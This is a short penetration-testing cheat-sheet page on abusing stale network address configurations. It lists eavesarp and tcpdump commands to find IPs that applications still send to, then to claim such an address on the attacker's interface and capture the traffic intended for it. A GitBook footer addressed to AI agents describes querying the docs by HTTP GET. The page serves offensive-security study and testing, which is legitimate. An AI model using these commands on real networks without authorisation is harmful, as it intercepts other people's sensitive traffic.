> For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/snacs-abuse.md).

# SNACs Abuse

* <https://www.blackhillsinfosec.com/analyzing-arp-to-discover-exploit-stale-network-address-configurations/>
* <https://github.com/arch4ngel/eavesarp>
* <https://github.com/s0i37/net/blob/main/arp_snac.py>

Actively analyze ARP traffic and hunt for SNACs (Stale Network Address Configurations):

```
$ sudo python3 eavesarp.py capture -i eth0 -ar -dr [--blacklist 192.168.1.11]
```

If a SNAC if found (can be detected, for example, when a host has moved from one IP to another and its DNS A record not matching its DNS PTR record anymore) so that some application in the network is still trying to send sensitive data to the *stale* IP address (because it may simply be hard-coded in the app), an adversary can set an alias for their interface pretending to be that host with the *stale* IP and collect all the traffic intended for it:

```
# Check again with tcpdump
$ sudo tcpdump -nvv -i eth0 "src host <STALE_IP> and arp"

# Abuse it!
$ sudo tcpdump -nA -i eth0 "src host <STALE_IP> and (dst port 80 or dst port 443)"
Or
$ sudo tcpdump -nvv -i eth0 -s 65535 -w eavesarp.pcap "host <STALE_IP>"
$ sudo ip addr add <STALE_IP>/24 dev eth0

# Clean up
$ sudo ip addr del <STALE_IP>/24 dev eth0
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/snacs-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.